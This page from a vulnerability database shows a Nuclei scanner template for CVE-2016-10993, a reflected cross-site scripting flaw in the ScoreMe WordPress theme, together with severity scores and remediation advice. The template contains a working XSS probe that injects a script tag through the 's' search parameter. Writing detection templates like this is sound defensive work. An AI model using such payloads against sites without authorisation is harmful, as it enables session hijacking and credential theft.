Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-10993
HistoryJul 31, 2021 - 11:41 p.m.

ScoreMe Theme - Cross-Site Scripting

2021-07-3123:41:54
ProjectDiscovery
github.com
11

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

64.8%

WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2016-10993

info:
  name: ScoreMe Theme - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.vulnerability-lab.com/get_content.php?id=1808
    - https://wpvulndb.com/vulnerabilities/8431
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10993
    - https://github.com/0xkucing/CVE-2016-10993
    - https://github.com/ARPSyndicate/cvemon
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2016-10993
    cwe-id: CWE-79
    cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:*
    epss-score: 0.00245
    epss-percentile: 0.64569
  metadata:
    framework: wordpress
    max-request: 2
    vendor: "scoreme_project"
    product: scoreme
  tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/themes/scoreme/style'

  - method: GET
    path:
      - "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f319130cf7f3120fea1c4c0d9fa2d0eef9c3cc8172527a5a2d2aadf7f8dcec0a02206d561e52b06dcd2d43d21d8051af220f4d7caa73706af1900b4c860eb285ed24:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

64.8%

Related for NUCLEI:CVE-2016-10993